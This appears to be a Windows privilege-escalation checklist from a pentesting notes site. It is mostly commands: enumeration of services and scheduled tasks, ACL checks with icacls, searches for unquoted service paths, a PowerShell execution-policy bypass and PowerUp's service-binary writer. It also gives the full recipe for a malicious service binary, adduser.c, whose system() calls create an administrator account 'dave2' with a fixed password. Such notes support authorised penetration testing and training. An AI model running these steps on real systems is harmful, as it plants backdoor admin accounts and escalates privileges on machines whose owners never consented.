← Back to search

Checking Services for Privesc

enumerationwindowschecklist

Summary

Sample adduser.c (cross-compile with mingw) creates a local admin: it calls system("net user dave2 password123! /add") then system("net localgroup administrators dave2 /add"). Replace a writable service binary with it, restart the service, and also check PowerShell history.

Walkthrough

Enumerate Windows services and their permissions to find privilege-escalation vectors: weak binary ACLs, unquoted service paths, modifiable service files, and scheduled tasks. Start with Get-Service, then drill into anything you can modify or restart.

Commands

List services and running service binaries

powershell

Get-Service
Get-CimInstance
Get-CimInstance -ClassName win32_service | Select Name,State,PathName | Where-Object {$_.State -like 'Running'}

Check permissions of each service binary

powershell

icacls "C:\xampp\apache\bin\httpd.exe"

Cross-compile a malicious service binary on Kali (adduser.c below)

bash

x86_64-w64-mingw32-gcc adduser.c -o adduser.exe

Stop the service, check its start mode, reboot if you hold SeShutdown

powershell

net stop mysql
Get-CimInstance -ClassName win32_service | Select Name, StartMode | Where-Object {$_.Name -like 'mysql'}
shutdown /r /t 0

Use PowerUp to find modifiable/unquoted services

powershell

powershell -ep bypass
Get-ModifiableServiceFile
Get-UnquotedService
Write-ServiceBinary -Name 'GammaService' -Path "C:\Program Files\Enterprise Apps\Current.exe"

Manually look for unquoted service paths

cmd

wmic service get name,pathname | findstr /i /v "C:\Windows\\" | findstr /i /v """

Enumerate scheduled tasks

powershell

Get-ScheduledTask
schtasks /query /fo LIST /v

If all else fails, gather patch info for a kernel exploit

powershell

systeminfo
Get-CimInstance -Class win32_quickfixengineering | Where-Object { $_.Description -eq "Security Update" }